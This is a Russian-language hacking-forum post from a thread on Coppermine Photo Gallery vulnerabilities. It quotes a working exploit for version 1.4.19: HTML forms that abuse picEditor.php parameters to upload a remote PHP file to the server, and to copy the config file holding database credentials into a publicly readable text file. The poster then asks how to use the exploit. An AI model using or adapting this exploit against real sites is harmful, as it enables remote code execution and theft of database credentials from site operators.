HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу [ Обзор уязвимостей Coppermine Photo Gallery ]
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #14  
Старый 05.04.2009, 08:21
dyx
Познающий
Регистрация: 05.04.2005
Сообщений: 46
С нами: 11104341

Репутация: 1
По умолчанию
Цитата:
Сообщение от number0  
Coppermine Photo gallery - Remote PHP File Upload 1.4.19

PHP код:
<?php
<html
    <form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=http%3A%2F%2Fwww.google.com&CURRENT_PIC[filename]=/test.php" 
method=post
        <input name="save" value=1
        <input name="keysToSkip" value=1
        <input name="_GET" value=1
        <input name="_REQUEST" value=1
        <input type=submit
    </form
</html


This request will copy the database connection info and make it readable here
http://10.1.1.155/Audit/cpg1419/albums/dbinfo.txt 
This attack works with allow_url_fopen=Off 
<html
    <form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=include/config.inc.php&CURRENT_PIC[filename]=/dbinfo.txt" 
method=post
        <input name="save" value=1
        <input name="keysToSkip" value=1
        <input name="_GET" value=1
        <input name="_REQUEST" value=1
        <input type=submit
    </form
</html>
?>
Эту хрень как юзать то, какие пути куда ставить???
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.